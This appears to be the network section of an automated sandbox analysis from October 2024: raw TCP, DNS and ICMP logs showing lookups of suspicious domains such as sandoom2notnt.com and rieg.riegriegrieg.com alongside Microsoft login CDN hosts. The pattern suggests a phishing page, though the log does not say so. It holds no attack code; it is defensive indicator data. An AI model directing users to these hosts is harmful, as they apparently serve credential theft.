                                                                              Oct 26, 2024 08:49:58.415235043 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.415247917 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.431785107 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.432600975 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.432600975 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.432667017 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.432698965 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.480149984 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.480653048 CEST49976443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.480690956 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.481180906 CEST49976443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.481193066 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.548842907 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.548913002 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.549177885 CEST49977443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.549211979 CEST49977443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.549211979 CEST49977443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.549228907 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.549232960 CEST4434997713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.552947998 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.552974939 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.553169012 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.553344011 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.553354979 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.563235998 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.563283920 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.563405037 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.563505888 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.563505888 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.563571930 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.563571930 CEST49978443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.563604116 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.563616991 CEST4434997813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.565933943 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.565970898 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.566052914 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.566200972 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.566220045 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.617861032 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.618065119 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.618190050 CEST49976443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.618334055 CEST49976443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.618356943 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.618398905 CEST49976443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.618415117 CEST4434997613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.621035099 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.621067047 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.621165037 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.621361971 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.621373892 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.642293930 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.642874956 CEST49979443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.642904043 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.643389940 CEST49979443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.643398046 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.776783943 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.776947021 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.777162075 CEST49979443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.777162075 CEST49979443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.777400970 CEST49979443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.777421951 CEST4434997913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.780419111 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.780468941 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:58.780591965 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.780786991 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:58.780801058 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.115729094 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.116295099 CEST49980443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.116328001 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.117027998 CEST49980443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.117033005 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.247164965 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.247230053 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.247376919 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.247459888 CEST49980443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.247637987 CEST49980443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.247637987 CEST49980443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.247651100 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.247659922 CEST4434998013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.251626968 CEST49985443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.251640081 CEST4434998513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.251746893 CEST49985443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.252080917 CEST49985443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.252090931 CEST4434998513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.298944950 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.300082922 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.300082922 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.300113916 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.300128937 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.318914890 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.319403887 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.319417953 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.319977999 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.319983006 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.346410990 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.346879959 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.346913099 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.348072052 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.348078012 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.437338114 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.437434912 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.437503099 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.437737942 CEST49981443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.437755108 CEST4434998113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.441785097 CEST49986443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.441829920 CEST4434998613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.441895962 CEST49986443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.442265987 CEST49986443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.442274094 CEST4434998613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452516079 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452589989 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452640057 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.452663898 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452702045 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452761889 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.452877998 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.452877998 CEST49982443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.452889919 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.452897072 CEST4434998213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.456188917 CEST49987443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.456208944 CEST4434998713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.456301928 CEST49987443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.456415892 CEST49987443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.456423044 CEST4434998713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.475011110 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.475156069 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.475296974 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.475367069 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.475378990 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.475389957 CEST49983443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.475394964 CEST4434998313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.478327036 CEST49988443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.478368044 CEST4434998813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.478445053 CEST49988443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.478996992 CEST49988443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.479011059 CEST4434998813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.524313927 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.524820089 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.524846077 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.525620937 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.525625944 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.655392885 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.655467033 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.655564070 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.655566931 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.655622959 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.655958891 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.655977011 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.655987024 CEST49984443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.655992985 CEST4434998413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.659486055 CEST49989443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.659569025 CEST4434998913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:59.659681082 CEST49989443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.661309004 CEST49989443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:59.661344051 CEST4434998913.107.246.45192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 26, 2024 08:48:37.131345987 CEST53528691.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:37.203202009 CEST53616611.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:38.411818027 CEST53621271.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:38.484426022 CEST4957253192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:38.484667063 CEST6258353192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:38.491825104 CEST53625831.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:38.492096901 CEST53495721.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:40.000349998 CEST6313353192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:40.000586033 CEST4922453192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:40.415788889 CEST53492241.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:40.517486095 CEST53631331.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:40.727405071 CEST5029153192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:40.728128910 CEST5548453192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:40.934272051 CEST53554841.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:40.934354067 CEST53502911.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:42.093183994 CEST6099953192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:42.096874952 CEST6243453192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:42.311527967 CEST53609991.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:42.335392952 CEST53624341.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:45.620544910 CEST5648353192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:45.621057987 CEST6099653192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:45.628916979 CEST53609961.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:45.631484032 CEST53564831.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:46.510600090 CEST6509353192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:46.511058092 CEST6094853192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:46.518309116 CEST53650931.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:46.726859093 CEST53609481.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.169317007 CEST6048753192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.169317007 CEST5068053192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.173896074 CEST6304653192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.174159050 CEST6194753192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.177922010 CEST53506801.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.181595087 CEST53619471.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.182007074 CEST53630461.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.193912029 CEST53604871.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.250746965 CEST5394053192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.251786947 CEST5611253192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:47.258666039 CEST53539401.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.259262085 CEST53561121.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:47.306819916 CEST138138192.168.2.4192.168.2.255
                                                                              Oct 26, 2024 08:48:47.308768988 CEST53564141.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:51.815685034 CEST6057553192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:51.816965103 CEST5657353192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:48:51.823467970 CEST53605751.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:51.825033903 CEST53565731.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:48:55.575382948 CEST53514651.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:14.606038094 CEST53647661.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:36.749830961 CEST53631061.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:37.031996965 CEST53575121.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:41.103271008 CEST5311253192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:41.103837967 CEST6079053192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:41.117326021 CEST53531121.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:41.139216900 CEST53607901.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:44.734761000 CEST6398553192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:44.735121012 CEST4940853192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:44.749969959 CEST53494081.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:44.896059990 CEST53639851.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:50.704705954 CEST5124653192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:50.705112934 CEST6425153192.168.2.41.1.1.1
                                                                              Oct 26, 2024 08:49:50.712616920 CEST53512461.1.1.1192.168.2.4
                                                                              Oct 26, 2024 08:49:50.716564894 CEST53642511.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              Oct 26, 2024 08:48:46.726921082 CEST192.168.2.41.1.1.1c230(Port unreachable)Destination Unreachable
                                                                              Oct 26, 2024 08:49:41.139275074 CEST192.168.2.41.1.1.1c27b(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 26, 2024 08:48:38.484426022 CEST192.168.2.41.1.1.10xb71Standard query (0)www.google.co.ukA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:38.484667063 CEST192.168.2.41.1.1.10xd38bStandard query (0)www.google.co.uk65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.000349998 CEST192.168.2.41.1.1.10x6322Standard query (0)taxigiarebienhoa.vnA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.000586033 CEST192.168.2.41.1.1.10x3b2eStandard query (0)taxigiarebienhoa.vn65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.727405071 CEST192.168.2.41.1.1.10x4090Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.728128910 CEST192.168.2.41.1.1.10xa86bStandard query (0)www.google.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:42.093183994 CEST192.168.2.41.1.1.10xc6e5Standard query (0)rieg.riegriegrieg.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:42.096874952 CEST192.168.2.41.1.1.10x34aaStandard query (0)rieg.riegriegrieg.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.620544910 CEST192.168.2.41.1.1.10x6996Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.621057987 CEST192.168.2.41.1.1.10xc5b4Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:46.510600090 CEST192.168.2.41.1.1.10x5a97Standard query (0)rieg.riegriegrieg.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:46.511058092 CEST192.168.2.41.1.1.10x20ebStandard query (0)rieg.riegriegrieg.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.169317007 CEST192.168.2.41.1.1.10x3143Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.169317007 CEST192.168.2.41.1.1.10x51d4Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.173896074 CEST192.168.2.41.1.1.10x395Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.174159050 CEST192.168.2.41.1.1.10x100eStandard query (0)www.w3schools.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.250746965 CEST192.168.2.41.1.1.10xad82Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.251786947 CEST192.168.2.41.1.1.10x8f3aStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.815685034 CEST192.168.2.41.1.1.10xc8cStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:51.816965103 CEST192.168.2.41.1.1.10x2fe8Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                              Oct 26, 2024 08:49:41.103271008 CEST192.168.2.41.1.1.10x3da7Standard query (0)sandoom2notnt.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:41.103837967 CEST192.168.2.41.1.1.10x4ff9Standard query (0)sandoom2notnt.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:49:44.734761000 CEST192.168.2.41.1.1.10xfe82Standard query (0)sandoom2notnt.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:44.735121012 CEST192.168.2.41.1.1.10xc709Standard query (0)sandoom2notnt.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.704705954 CEST192.168.2.41.1.1.10x22b0Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:49:50.705112934 CEST192.168.2.41.1.1.10xf203Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 26, 2024 08:48:38.491825104 CEST1.1.1.1192.168.2.40xd38bNo error (0)www.google.co.uk65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:38.492096901 CEST1.1.1.1192.168.2.40xb71No error (0)www.google.co.uk172.217.16.195A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.517486095 CEST1.1.1.1192.168.2.40x6322No error (0)taxigiarebienhoa.vn103.255.237.40A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.934272051 CEST1.1.1.1192.168.2.40xa86bNo error (0)www.google.com65IN (0x0001)false
                                                                              Oct 26, 2024 08:48:40.934354067 CEST1.1.1.1192.168.2.40x4090No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:42.311527967 CEST1.1.1.1192.168.2.40xc6e5No error (0)rieg.riegriegrieg.com192.185.209.0A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.628916979 CEST1.1.1.1192.168.2.40xc5b4No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.631484032 CEST1.1.1.1192.168.2.40x6996No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.631484032 CEST1.1.1.1192.168.2.40x6996No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.631484032 CEST1.1.1.1192.168.2.40x6996No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.631484032 CEST1.1.1.1192.168.2.40x6996No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:45.631484032 CEST1.1.1.1192.168.2.40x6996No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:46.518309116 CEST1.1.1.1192.168.2.40x5a97No error (0)rieg.riegriegrieg.com192.185.209.0A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.177922010 CEST1.1.1.1192.168.2.40x51d4No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.177922010 CEST1.1.1.1192.168.2.40x51d4No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.177922010 CEST1.1.1.1192.168.2.40x51d4No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.177922010 CEST1.1.1.1192.168.2.40x51d4No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.177922010 CEST1.1.1.1192.168.2.40x51d4No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.181595087 CEST1.1.1.1192.168.2.40x100eNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.182007074 CEST1.1.1.1192.168.2.40x395No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.182007074 CEST1.1.1.1192.168.2.40x395No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.193912029 CEST1.1.1.1192.168.2.40x3143No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.257683992 CEST1.1.1.1192.168.2.40xaab6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.257683992 CEST1.1.1.1192.168.2.40xaab6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.258666039 CEST1.1.1.1192.168.2.40xad82No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.258666039 CEST1.1.1.1192.168.2.40xad82No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.258666039 CEST1.1.1.1192.168.2.40xad82No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.259182930 CEST1.1.1.1192.168.2.40x772fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.259182930 CEST1.1.1.1192.168.2.40x772fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.259262085 CEST1.1.1.1192.168.2.40x8f3aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2024 08:48:47.259262085 CEST1.1.1.1192.168.2.40x8f3aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
